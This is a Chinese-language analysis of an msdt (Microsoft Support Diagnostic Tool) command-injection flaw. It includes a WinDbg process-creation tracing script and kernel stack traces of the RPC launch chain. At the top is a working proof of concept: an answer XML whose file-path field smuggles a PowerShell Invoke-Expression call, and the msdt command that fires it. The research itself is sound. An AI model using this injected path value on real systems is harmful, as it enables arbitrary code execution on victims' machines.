测试样本
1.xml:
<?xml version="1.0" encoding="utf-8"?>
<Answers Version="1.0">
<Interaction ID="IT_LaunchMethod">
<Value>ContextMenu</Value>
</Interaction>
<Interaction ID="IT_SelectProgram">
<Value>NotListed</Value>
</Interaction>
<Interaction ID="IT_BrowseForFile">
<Value>/../../$(Invoke-Expression('calc.exe'))/.exe</Value>
</Interaction>
</Answers>
复现步骤:
CMD运行命令:msdt /af C:\Users\yellowboy\Desktop\1.xml /id PCWDiagnostic /skip force
Windbg双机调试:
调试脚本
$$ Process-creation tracer. Run it from the bu on nt!PspUpdateCreateInfo that follows; every
$$ created process is logged, and the one whose image path matches the pattern stops the debugger.
$$ NOTE(review): the offsets rdx+b8 and rdx+28 and the use of @r8 as the EPROCESS are build-specific
$$ assumptions of this script — confirm them against the kernel build under test before reusing.
r @$t0=rdx+b8;
$$ $t1 = the new process's RTL_USER_PROCESS_PARAMETERS; ImagePathName and CommandLine are read from it below
r? @$t1= *(nt!_RTL_USER_PROCESS_PARAMETERS**) @$t0;
$$ /msu reads a UNICODE_STRING at the given address, so ${path} holds the image path as text
as /msu path @@c++(&@$t1->ImagePathName);
$$ .block makes the alias set above expand when the block is entered, so ${path} is usable inside
.block{
$$ Wildcard match on the image path of the process being created; replace the placeholder with the image to stop on
.if($spat("${path}","*your-target-name*")){
.printf "\n[*] The blocked ImagePathName is: %mu \n[*] Its CommandLine is: %mu \n" ,@@c++(@$t1->ImagePathName.Buffer), @@c++(@$t1->CommandLine.Buffer);
.printf "[+] Its entry point is: %P\n" ,poi(rdx+28);
$$ Drop all aliases so the next hit starts clean
ad*;
.printf "[+] nt!_EPROCESS is: %P\n\n" ,@r8;
!process @r8;
.reload;
.printf "\n\n========This is the thread that created the target process========\n\n";
$$ The current thread is the one issuing the create, i.e. the parent side of the launch chain
!thread @$thread;
$$ No gc in this branch: the debugger stays broken in on the matching process
}
.else{
$$ Non-matching processes are only logged. The output reproduced on this page ("[] Pass : ImagePath is: ...")
$$ uses different wording than these .printf strings, so it was presumably produced by a variant of this script.
$$ From a detection standpoint that output is the useful artifact: it records msdt.exe, sdiagnhost.exe,
$$ csc.exe/cvtres.exe and finally calc.exe being created during a single msdt /af run.
.printf "\n[*] The ImagePathName that is passed is: %mu \n[*] Its CommandLine is: %mu \n\n" ,@@c++(@$t1->ImagePathName.Buffer),@@c++(@$t1->CommandLine.Buffer);
ad*;
gc;
}
}
调试命令:
$$ Unresolved breakpoint on the kernel's process-create notification; '$$><file' runs the tracer script
$$ above, condensed to one line, and 'gc' resumes when the j condition is false.
$$ NOTE(review): rcx==6 presumably selects one create stage of PspUpdateCreateInfo — confirm against the
$$ kernel build. Replace [your script path] with the saved tracer script.
bu nt!PspUpdateCreateInfo "j (rcx==6) '$$><[your script path]'; 'gc'"
调试
调试输出:
[] Pass : ImagePath is: C:\Windows\system32\msdt.exe [] Pass : CMD is: msdt /af C:\Users\yellowboy\Desktop\1.xml /id PCWDiagnostic /skip force
[] Pass : ImagePath is: C:\Windows\System32\sdiagnhost.exe [] Pass : CMD is: C:\Windows\System32\sdiagnhost.exe -Embedding
[] Pass : ImagePath is: ??\C:\Windows\system32\conhost.exe [] Pass : CMD is: ??\C:\Windows\system32\conhost.exe
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe [] Pass : CMD is: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\yellowboy\AppData\Local\Temp\usyf9diy.cmdline"
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe [] Pass : CMD is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\YELLOW~1\AppData\Local\Temp\RES4569.tmp" "c:\Users\yellowboy\AppData\Local\Temp\CSC4568.tmp"
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe [] Pass : CMD is: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\yellowboy\AppData\Local\Temp\4u9q9klc.cmdline"
[] Pass : ImagePath is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe [] Pass : CMD is: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\YELLOW~1\AppData\Local\Temp\RES47D9.tmp" "c:\Users\yellowboy\AppData\Local\Temp\CSC47D8.tmp"
[] Block ImagePath is: C:\Windows\system32\calc.exe [] Block CMD is: "C:\Windows\system32\calc.exe"
堆栈:
msdt RPC通信启动服务过程:
1: kd> !thread /t 0x1af0
THREAD ffffab0fd0f82080 Cid 0d44.1af0 Teb: 000000c32b520000 Win32Thread: ffffab0fce614520 WAIT: (WrLpcReply) UserMode Non-Alertable
ffffab0fd0f82508 Semaphore Limit 0x1
Waiting for reply to ALPC Message ffff9a86331a6c60 : queued at port ffffab0fcf0c1aa0 : owned by process ffffab0fcf1682c0
Not impersonating
DeviceMap ffff9a862f4972b0
Owning Process ffffab0fcfc34340 Image: msdt.exe
Attached Process N/A Image: N/A
Wait Start TickCount 76561 Ticks: 0
Context Switch Count 132 IdealProcessor: 0
UserTime 00:00:00.031
KernelTime 00:00:00.046
Win32 Start Address 0x00007ff618406630
Stack Init ffffe385b785ac90 Current ffffe385b785a4b0
Base ffffe385b785b000 Limit ffffe385b7855000 Call 0000000000000000
Priority 11 BasePriority 8 PriorityDecrement 2 IoPriority 2 PagePriority 5
1: kd> .thread /r /p ffffab0fd0f82080 ;kv
Implicit thread is now ffffab0f`d0f82080
Implicit process is now ffffab0f`cfc34340
.cache forcedecodeuser done
Loading User Symbols
..............................................................
************* Symbol Loading Error Summary **************
Module name Error
SharedUserData No error - symbol load deferred
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*** Stack trace for last set context - .thread/.cxr resets it
# Child-SP RetAddr : Args to Child : Call Site
00 ffffe385`b785a4f0 fffff803`0a86aad4 : 00000000`00000000 ffffd201`9f7c8180 ffffe385`00000000 ffffab0f`d0f82080 : nt!KiSwapContext+0x76
01 ffffe385`b785a630 fffff803`0a8657ca : ffffab0f`00000000 00000000`00000000 ffffab0f`d0f82080 fffff803`0a88b72a : nt!KiSwapThread+0x190
02 ffffe385`b785a6a0 fffff803`0a866fb0 : ffffab0f`d0f82508 ffffab0f`00000000 ffffe385`00000000 ffffab0f`d0f82508 : nt!KiCommitThreadWait+0x13a
03 ffffe385`b785a750 fffff803`0a84bd02 : 00000000`00000001 00000000`00000011 ffffab0f`d0f82501 ffffab0f`d0adb200 : nt!KeWaitForSingleObject+0x140
04 ffffe385`b785a7f0 fffff803`0a84bc90 : 00000000`00000000 ffffab0f`d0f82508 00000000`00000011 00000000`00000000 : nt!AlpcpWaitForSingleObject+0x3e
05 ffffe385`b785a830 fffff803`0abc702b : 00000000`00020000 ffffe385`b785aa49 ffffab0f`d0adb2d0 ffffab0f`d0f82508 : nt!AlpcpSignalAndWait+0x54
06 ffffe385`b785a870 fffff803`0abc6cf7 : ffffe385`b785a950 00000000`00020000 ffffe385`b785aa49 000001fd`58c8bff0 : nt!AlpcpReceiveSynchronousReply+0x57
07 ffffe385`b785a8d0 fffff803`0abcaa8f : ffffab0f`d0adb2d0 00000000`00020000 000001fd`58c8bff0 000001fd`58c985a8 : nt!AlpcpProcessSynchronousRequest+0x1a7
08 ffffe385`b785a9d0 fffff803`0a9af275 : ffffab0f`d0f82080 000000c3`2b77cd38 ffffe385`b785aaa8 000001fd`58c981a0 : nt!NtAlpcSendWaitReceivePort+0x17f
09 ffffe385`b785aa90 00007ff8`fafabf04 : 00007ff8`f96a6eb2 000000c3`2b77cf50 000001fd`58c98230 000001fd`58c981a0 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffe385`b785ab00)
0a 000000c3`2b77cd18 00007ff8`f96a6eb2 : 000000c3`2b77cf50 000001fd`58c98230 000001fd`58c981a0 00000000`00000000 : ntdll!NtAlpcSendWaitReceivePort+0x14
0b 000000c3`2b77cd20 00007ff8`f96a4001 : 000001fd`550764a0 000001fd`58c98480 000000c3`2b77cf50 000001fd`58c98230 : RPCRT4!LRPC_BASE_CCALL::DoSendReceive+0x112
0c 000000c3`2b77cdd0 00007ff8`f968e93f : 00000000`00000000 000001fd`58c98230 000001fd`5514f770 00000000`00000091 : RPCRT4!LRPC_CCALL::SendReceive+0x51
0d 000000c3`2b77ce20 00007ff8`faaf3555 : 000001fd`58c981a0 000001fd`55070150 000001fd`58c987e0 00007ff8`faf248ea : RPCRT4!I_RpcSendReceive+0x6f
0e 000000c3`2b77ce50 00007ff8`faaf2608 : 000001fd`00000000 000001fd`550a9790 000001fd`550a9790 00000000`00000380 : combase!CMessageCall::RpcSendRequestReceiveResponse+0xb5 [onecore\com\combase\dcomrem\call.cxx @ 4209]
0f (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!ThreadSendReceive+0xc0 (Inline Function @ 00007ff8`faaf2608) [onecore\com\combase\dcomrem\channelb.cxx @ 7378]
10 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!CSyncClientCall::SwitchAptAndDispatchCall+0x151 (Inline Function @ 00007ff8`faaf2608) [onecore\com\combase\dcomrem\channelb.cxx @ 5900]
11 000000c3`2b77d030 00007ff8`faac7bd4 : 00000000`00000005 00000000`00000190 000000c3`00000003 000001fd`58c845f0 : combase!CSyncClientCall::SendReceive2+0x248 [onecore\com\combase\dcomrem\channelb.cxx @ 5459]
12 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!SyncClientCallRetryContext::SendReceiveWithRetry+0x25 (Inline Function @ 00007ff8`faac7bd4) [onecore\com\combase\dcomrem\callctrl.cxx @ 1542]
13 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!CSyncClientCall::SendReceiveInRetryContext+0x25 (Inline Function @ 00007ff8`faac7bd4) [onecore\com\combase\dcomrem\callctrl.cxx @ 565]
14 000000c3`2b77d530 00007ff8`faac3dbb : 000000c3`2b77d690 000001fd`58c845f0 000000c3`2b77d980 00000000`00000000 : combase!DefaultSendReceive+0x64 [onecore\com\combase\dcomrem\callctrl.cxx @ 523]
15 000000c3`2b77d590 00007ff8`faacb2b4 : 000070dc`3de1e182 00000000`00000004 000000c3`2b77d9e0 00000000`00000001 : combase!CSyncClientCall::SendReceive+0x18b [onecore\com\combase\dcomrem\ctxchnl.cxx @ 783]
16 000000c3`2b77d7c0 00007ff8`fab4030e : 000000c3`2b77d9e0 000000c3`2b77df80 00000000`00000000 00000000`00000001 : combase!CClientChannel::SendReceive+0x84 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 655]
17 000000c3`2b77d830 00007ff8`f9739d84 : 00007ff8`f9688e00 000000c3`00000000 000000c3`2b77df80 00000000`00000000 : combase!NdrExtpProxySendReceive+0x4e [onecore\com\combase\ndr\ndrole\proxy.cxx @ 2002]
18 000000c3`2b77d860 00007ff8`fab3a3b8 : 00007ff8`facf3080 000000c3`2b77dfb0 ffffffff`00000000 00000000`00000000 : RPCRT4!NdrpClientCall3+0x3a4
19 000000c3`2b77dbd0 00007ff8`fabb6b32 : 00000000`00000005 00000000`00000000 00000000`00000000 000000c3`2b77e0b0 : combase!ObjectStublessClient+0x138 [onecore\com\combase\ndr\ndrole\amd64\stblsclt.cxx @ 369]
1a 000000c3`2b77df60 00007ff8`faafe381 : 000001fd`58c75b38 00000000`00000000 000000c3`2b77e768 000000c3`2b77e000 : combase!ObjectStubless+0x42 [onecore\com\combase\ndr\ndrole\amd64\stubless.asm @ 176]
1b 000000c3`2b77dfb0 00007ff8`fab63206 : 000000c3`2b77e768 000000c3`2b77f008 00000000`00000000 000000c3`2b77e1d0 : combase!CRpcResolver::DelegateActivationToSCM+0x4b5 [onecore\com\combase\dcomrem\resolver.cxx @ 2283]
1c 000000c3`2b77e170 00007ff8`faafcf05 : 000000c3`2b77e768 000000c3`2b77e400 000000c3`2b77e1d0 00000000`00000000 : combase!CRpcResolver::CreateInstance+0x1a [onecore\com\combase\dcomrem\resolver.cxx @ 2491]
1d 000000c3`2b77e1a0 00007ff8`fab00610 : 000000c3`2b77e768 ffffff3c`d4881ad0 00000000`00000040 00000000`80004005 : combase!CClientContextActivator::CreateInstance+0x135 [onecore\com\combase\objact\actvator.cxx @ 616]
1e 000000c3`2b77e450 00007ff8`fab0b7ba : 00000000`00000000 000000c3`2b77ef90 00000000`00000001 00000000`00000000 : combase!ActivationPropertiesIn::DelegateCreateInstance+0x90 [onecore\com\combase\actprops\actprops.cxx @ 1983]
1f 000000c3`2b77e4e0 00007ff8`fab0a289 : 000000c3`2b77f6b8 00007ff8`faf30d9a 00000804`00000000 000001fd`551b3272 : combase!ICoCreateInstanceEx+0x90a [onecore\com\combase\objact\objact.cxx @ 2028]
20 000000c3`2b77f3b0 00007ff8`fab0a0cc : 00000000`00000001 00007ff8`fa05c1de 000001fd`58c46c58 00000000`00000000 : combase!CComActivator::DoCreateInstance+0x169 [onecore\com\combase\objact\immact.hxx @ 386]
21 (Inline Function) --------`-------- : --------`-------- --------`-------- --------`-------- --------`-------- : combase!CoCreateInstanceEx+0xd1 (Inline Function @ 00007ff8`fab0a0cc) [onecore\com\combase\objact\actapi.cxx @ 177]
22 000000c3`2b77f510 00007ff8`f4139964 : 00000000`00000000 00000000`00000000 000000c3`2b77f609 000001fd`551bd300 : combase!CoCreateInstance+0x10c [onecore\com\combase\objact\actapi.cxx @ 121]
23 000000c3`2b77f5b0 00007ff8`f413894f : 00000000`00000000 00000000`00000000 000001fd`5a0c9b50 000001fd`551bd300 : sdiageng!CScriptedDiag::InitializeHost+0x130
24 000000c3`2b77f670 00007ff6`1841f876 : 00000000`00000000 000000c3`2b77f780 00000000`00000000 00007ff6`18423cde : sdiageng!CScriptedDiag::Diagnose+0x12f //重要
25 000000c3`2b77f750 00007ff6`18416da9 : 00000000`00000000 000001fd`55074ce8 000001fd`551bd300 00000000`00000000 : msdt!PackageCollection::Diagnose+0x166
26 000000c3`2b77f7b0 00007ff6`18413c36 : 000001fd`551b60a0 00000000`00000000 00000000`00000001 000000c3`2b77f848 : msdt!Package_Diagnose+0x51
27 000000c3`2b77f7f0 00007ff6`184069ad : 00000000`00000000 00000000`00000000 000001fd`551bd740 00000000`00000000 : msdt!Packages_Diagnose+0x176
28 000000c3`2b77f890 00007ff8`f9556fd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msdt!WorkerThread+0x37d
29 000000c3`2b77f8f0 00007ff8`faf5cec1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
2a 000000c3`2b77f920 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
与msiexec启动服务的流程差不多《ISCMLocalActivator》:
msdt-》svchost
1: kd> dt _guid 000000c3`2b77dd34
combase!_GUID
{00000136-0000-0000-c000-000000000046}
+0x000 Data1 : 0x136
+0x004 Data2 : 0
+0x006 Data3 : 0
+0x008 Data4 : [8] "???"
procnum:0x4
svchost-》svchost
1: kd> dt 00007ff8`f6795d50+4 _guid
ntdll!_GUID
{9b8699ae-0e44-47b1-8e7f-86a461d7ecdc}
+0x000 Data1 : 0x9b8699ae
+0x004 Data2 : 0xe44
+0x006 Data3 : 0x47b1
+0x008 Data4 : [8] "???"
1: kd> dw 00007ff8`f6792922+6 //RPCRT4!NdrpClientCall2:arg2(word ptr【pFormat+6】)
00007ff8`f6792928 0000
procnum:0x0
1: kd> .thread /p /r ffffab0fd0fe8080 ;kv
Implicit thread is now ffffab0f`d0fe8080
Implicit process is now ffffab0f`cf1682c0
.cache forcedecodeuser done
Loading User Symbols
........................................
************* Symbol Loading Error Summary **************
Module name Error
SharedUserData No error - symbol load deferred
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
*** Stack trace for last set context - .thread/.cxr resets it
00 ffffe385`b81174f0 fffff803`0a86aad4 : 00000000`00000000 ffffd201`9f7c8180 ffffe385`00000000 ffffab0f`d0fe8080 : nt!KiSwapContext+0x76
01 ffffe385`b8117630 fffff803`0a8657ca : ffffab0f`00000000 00000000`00000000 ffffab0f`d0fe8080 fffff803`0a88b72a : nt!KiSwapThread+0x190
02 ffffe385`b81176a0 fffff803`0a866fb0 : ffffab0f`d0fe8508 ffffab0f`00000000 ffffe385`00000000 ffffab0f`d0fe8508 : nt!KiCommitThreadWait+0x13a
03 ffffe385`b8117750 fffff803`0a84bd02 : 00000000`00000001 00000000`00000011 ffffab0f`d0fe8501 ffffab0f`cf159a00 : nt!KeWaitForSingleObject+0x140
04 ffffe385`b81177f0 fffff803`0a84bc90 : 00000000`00000000 ffffab0f`d0fe8508 00000000`00000011 00000000`00000000 : nt!AlpcpWaitForSingleObject+0x3e
05 ffffe385`b8117830 fffff803`0abc702b : 00000000`00020000 ffffe385`b8117a49 ffffab0f`cf159a80 ffffab0f`d0fe8508 : nt!AlpcpSignalAndWait+0x54
06 ffffe385`b8117870 fffff803`0abc6cf7 : ffffe385`b8117950 00000000`00020000 ffffe385`b8117a49 00000233`750b3570 : nt!AlpcpReceiveSynchronousReply+0x57
07 ffffe385`b81178d0 fffff803`0abcaa8f : ffffab0f`cf159a80 00000000`00020000 00000233`750b3570 00000233`75078868 : nt!AlpcpProcessSynchronousRequest+0x1a7
08 ffffe385`b81179d0 fffff803`0a9af275 : ffffab0f`d0fe8080 00000069`8b97d018 ffffe385`b8117aa8 00007ff8`f9752e24 : nt!NtAlpcSendWaitReceivePort+0x17f
09 ffffe385`b8117a90 00007ff8`fafabf04 : 00007ff8`f96a3d9f 00000069`8b97d850 00000069`8b97d350 00000069`8b97d760 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffe385`b8117b00)
0a 00000069`8b97cff8 00007ff8`f96a3d9f : 00000069`8b97d850 00000069`8b97d350 00000069`8b97d760 00000069`8b97d350 : ntdll!NtAlpcSendWaitReceivePort+0x14
0b 00000069`8b97d000 00007ff8`f96b8c87 : 00000000`00000000 00007ff8`f6788160 00000069`8b97d1a0 00000069`8b97d850 : RPCRT4!LRPC_BASE_CCALL::SendReceive+0x12f
0c 00000069`8b97d0d0 00007ff8`f96617f0 : 00000000`00000000 00000233`75010270 00000069`8b97d850 00000000`00000000 : RPCRT4!NdrpSendReceive+0x97
0d 00000069`8b97d100 00007ff8`f966120f : 00000069`8b97d8b0 007b003a`0054004e 00360038`00300038 00340044`00420045 : RPCRT4!NdrpClientCall2+0x5d0
0e 00000069`8b97d720 00007ff8`f6696ad8 : 00000000`00000000 00007ff8`f6792922 00000233`75010270 00000069`8b97d820 : RPCRT4!NdrClientCall2+0x1f
0f 00000069`8b97d750 00007ff8`f66c7c96 : 00000000`00000000 00000000`00000000 00000069`00000001 00000233`75bf1040 : rpcss!CClassicComClassData::LaunchActivatorServer+0x178
10 00000069`8b97d8a0 00007ff8`f66b62b4 : 00000233`75bd8290 00000000`00000000 00000069`8b97dc90 00000069`8b97dd68 : rpcss!CServerTableEntry::StartServerAndWait+0x2de
11 00000069`8b97dc40 00007ff8`f66b54c0 : 00000000`00000000 00000000`00000000 00000000`00000000 00000233`75b63c70 : rpcss!Activation+0xa04
12 00000069`8b97def0 00007ff8`f66d71a9 : 00000069`8b97e620 00000069`8b97e3f8 00000233`75085578 00000233`75084e40 : rpcss!ActivateFromProperties+0x230
13 00000069`8b97dfe0 00007ff8`f66b49f6 : 00000000`00000000 00000069`8b97e180 00000233`75085088 00000233`75084e01 : rpcss!ActivationPropertiesIn::DelegateCreateInstance+0x99
14 00000069`8b97e080 00007ff8`f66b1207 : 00000069`8b97e4a0 00000000`00000000 00000069`8b97e4a0 00000000`00000000 : rpcss!ActivateFromPropertiesPreamble+0x2406
15 00000069`8b97e3a0 00007ff8`f66ac501 : 00000233`755d8b60 00000233`000000a0 00000069`8b97e7e0 00007ff8`f66a071e : rpcss!PerformScmStage+0x9e7
16 00000069`8b97e5d0 00007ff8`f96d2033 : 00000233`755d8b60 00000233`75573590 00000233`75bed040 00000069`8b97ef70 : rpcss!SCMActivatorCreateInstance+0x1b1
17 00000069`8b97e900 00007ff8`f967c837 : 00007ff8`f679d3f2 00000069`8b97ed90 00000233`755fde00 00007ff8`00000000 : RPCRT4!Invoke+0x73
18 00000069`8b97e980 00007ff8`f96bd8ba : 00000069`8b97f240 00000014`00000004 00000000`00000014 00007ff8`faf4f4cd : RPCRT4!NdrStubCall2+0x727
19 00000069`8b97efe0 00007ff8`f96b6708 : 00000233`75037154 00000233`00000001 00000233`755d8b60 00000000`00000000 : RPCRT4!NdrServerCall2+0x1a
1a 00000069`8b97f010 00007ff8`f9699196 : 00000233`74f40000 00000233`7504daa0 00000069`8b97f210 00000233`74f40900 : RPCRT4!DispatchToStubInCNoAvrf+0x18
1b 00000069`8b97f060 00007ff8`f9698ae8 : 00000233`7504daa0 00000000`00000000 00000000`00000000 00000000`00000000 : RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1a6
1c 00000069`8b97f140 00007ff8`f96a72ff : 00000000`00000000 00007ff8`faf28282 00000233`755d8b60 00007ff8`faf6e4c1 : RPCRT4!RPC_INTERFACE::DispatchToStub+0xf8
1d 00000069`8b97f1b0 00007ff8`f96a6708 : 00000000`00040437 00000000`00000005 00000000`00000000 00000233`755fde00 : RPCRT4!LRPC_SCALL::DispatchRequest+0x31f
1e 00000069`8b97f280 00007ff8`f96a5cf1 : 00000000`00000000 00000233`755d7080 00000000`00000000 00000233`74fb0000 : RPCRT4!LRPC_SCALL::HandleRequest+0x7f8
1f 00000069`8b97f390 00007ff8`f96a575e : 00000000`00000000 00000000`00000000 00000000`00000001 00000233`7501e9f0 : RPCRT4!LRPC_ADDRESS::HandleRequest+0x341
20 00000069`8b97f430 00007ff8`f96a9ce2 : 00000000`00000000 00000233`755fde00 00000233`7501eaf8 00000069`8b97f808 : RPCRT4!LRPC_ADDRESS::ProcessIO+0x89e
21 00000069`8b97f570 00007ff8`faf4f220 : 00000001`00000bc6 00000000`00000000 00000069`8b97f808 00000000`00000184 : RPCRT4!LrpcIoComplete+0xc2
22 00000069`8b97f610 00007ff8`faf22536 : 00000000`00000000 00000233`7501eb00 00000000`00000000 00000233`75b69cb0 : ntdll!TppAlpcpExecuteCallback+0x260
23 00000069`8b97f690 00007ff8`f9556fd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!TppWorkerThread+0x456
24 00000069`8b97f990 00007ff8`faf5cec1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
25 00000069`8b97f9c0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
[*] Block ImagePath is: C:\Windows\System32\sdiagnhost.exe
[*] Block CMD is: C:\Windows\System32\sdiagnhost.exe -Embedding
启动服务创建进程sdiagnhost.exe
1: kd> !thread ffffab0fcf1a9080
THREAD ffffab0fcf1a9080 Cid 0358.03dc Teb: 0000006213abf000 Win32Thread: ffffab0fd0c41dd0 RUNNING on processor 1
Impersonation token: ffff9a8632d0c570 (Level Impersonation)
DeviceMap ffff9a862f4972b0
Owning Process ffffab0fcf0d9240 Image: svchost.exe
Attached Process N/A Image: N/A
Wait Start TickCount 76561 Ticks: 0
Context Switch Count 2809 IdealProcessor: 0
UserTime 00:00:00.078
KernelTime 00:00:00.125
Win32 Start Address ntdll!TppWorkerThread (0x00007ff8faf220e0)
Stack Init ffffe385b6b75c90 Current ffffe385b6b75520
Base ffffe385b6b76000 Limit ffffe385b6b70000 Call 0000000000000000
Priority 11 BasePriority 8 PriorityDecrement 48 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
ffffe385`b6b74d98 fffff803`0ab7547a : 00000000`000022bf ffffe385`b6b75350 00000000`00000000 00000000`00000000 : nt!MmCreatePeb
ffffe385`b6b74da0 fffff803`0aba8b6d : 00000000`00000000 ffffe385`b6b75350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x1162
ffffe385`b6b752d0 fffff803`0a9af275 : 00000000`00000002 00000000`00000001 00000000`00000000 00000247`d7839850 : nt!NtCreateUserProcess+0x6ed
ffffe385`b6b75a90 00007ff8`fafac684 : 00007ff8`f86d876c 00000000`00000000 00000062`141fe450 00000000`00000001 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffe385`b6b75b00)
00000062`141fcd58 00007ff8`f86d876c : 00000000`00000000 00000062`141fe450 00000000`00000001 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
00000062`141fcd60 00007ff8`f86d6083 : 00000000`00000660 00007ff8`f66cf197 00000247`d8217d10 00000062`141fe460 : KERNELBASE!CreateProcessInternalW+0xfcc
00000062`141fe270 00007ff8`f955dac0 : 00000062`00000008 00000000`00000660 00100001`00000030 00000000`00000000 : KERNELBASE!CreateProcessAsUserW+0x63
00000062`141fe2e0 00007ff8`f66ca95e : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!CreateProcessAsUserWStub+0x60
00000062`141fe350 00007ff8`f66d027f : 00000247`d8933680 00000247`d826c720 00000062`141fe899 00000000`00000000 : rpcss!CClassData::PrivilegedLaunchActivatorServer+0x79a
00000062`141fe7e0 00007ff8`f66d03bd : 00000247`d89bb510 00000247`d826c720 00000000`00000660 00000000`00000000 : rpcss!<lambda_cc7c03200483d218cdd1c387096ab1c1>::operator()+0x17b
00000062`141fe900 00007ff8`f96d2033 : 00000247`d78fcb20 00000247`d82681c8 00000247`d826821c 00000000`00000650 : rpcss!_LaunchActivatorServer+0xed
00000062`141fe9d0 00007ff8`f967c837 : 00007ff8`f679e9f2 00000062`141fee90 00000247`d7873bf0 00007ff8`00000000 : RPCRT4!Invoke+0x73
00000062`141fea80 00007ff8`f96bd8ba : 00007ff8`f6108250 00007ff8`f61093f0 00000062`141ff110 00007ff8`faf4f4cd : RPCRT4!NdrStubCall2+0x727
00000062`141ff0e0 00007ff8`f96b6708 : 00000000`00000000 00007ff8`00000001 00000000`00000003 000d8945`00000000 : RPCRT4!NdrServerCall2+0x1a
00000062`141ff110 00007ff8`f9699196 : 00000000`00000080 00000247`d783fef0 00000062`141ff310 00000000`00000000 : RPCRT4!DispatchToStubInCNoAvrf+0x18
00000062`141ff160 00007ff8`f9698ae8 : 00000247`d783fef0 00000000`00000000 00000000`00000000 00007ff8`f6698f3f : RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1a6
00000062`141ff240 00007ff8`f96a72ff : 00000000`00000000 00007ff8`faf1721b 00000247`d78fcb20 00007ff8`faf6e4c1 : RPCRT4!RPC_INTERFACE::DispatchToStub+0xf8
00000062`141ff2b0 00007ff8`f96a6708 : 00000000`00040437 00000000`00000001 00000000`00000000 00000247`d7873bf0 : RPCRT4!LRPC_SCALL::DispatchRequest+0x31f
00000062`141ff380 00007ff8`f96a5cf1 : 00000247`d826a340 00000247`d783d0d0 00000000`00000000 00000000`00000000 : RPCRT4!LRPC_SCALL::HandleRequest+0x7f8
00000062`141ff490 00007ff8`f96a575e : 00000000`00000000 00000000`00000000 00000000`00000001 00000247`d783f6a0 : RPCRT4!LRPC_ADDRESS::HandleRequest+0x341
00000062`141ff530 00007ff8`f96a9ce2 : 00000000`00000000 00000247`d7873bf0 00000247`d783f7a8 00000062`141ff908 : RPCRT4!LRPC_ADDRESS::ProcessIO+0x89e
00000062`141ff670 00007ff8`faf4f220 : 00000001`00000000 00000000`00000000 00000062`141ff908 00000000`00000080 : RPCRT4!LrpcIoComplete+0xc2
00000062`141ff710 00007ff8`faf22536 : 00000000`00000000 00000247`d7802300 00000000`00000000 00000247`d7867130 : ntdll!TppAlpcpExecuteCallback+0x260
00000062`141ff790 00007ff8`f9556fd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!TppWorkerThread+0x456
00000062`141ffa90 00007ff8`faf5cec1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000062`141ffac0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
RPC执行脚本过程:
客户端: {72b05d8b-258d-469d-a4d1-d142e823394c}: IID IScriptedDiagnosticHost
1: kd> dt 00000000`03e62eb4 _guid
ntdll!_GUID
{72b05d8b-258d-469d-a4d1-d142e823394c}
+0x000 Data1 : 0x72b05d8b
+0x004 Data2 : 0x258d
+0x006 Data3 : 0x469d
+0x008 Data4 : [8] "???"
procnum:0x4
1: kd> .thread /p /r fffffa80321fe060;!thread fffffa80321fe060
Implicit thread is now fffffa80`321fe060
Implicit process is now fffffa80`313ff7a0
.cache forcedecodeuser done
Loading User Symbols
......................................................
************* Symbol Loading Error Summary **************
Module name Error
SharedUserData No error - symbol load deferred
360Hvm64 The system cannot find the file specified
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
THREAD fffffa80321fe060 Cid 0858.0314 Teb: 000007fffffd7000 Win32Thread: fffff900c1d47010 WAIT: (WrLpcReply) UserMode Non-Alertable
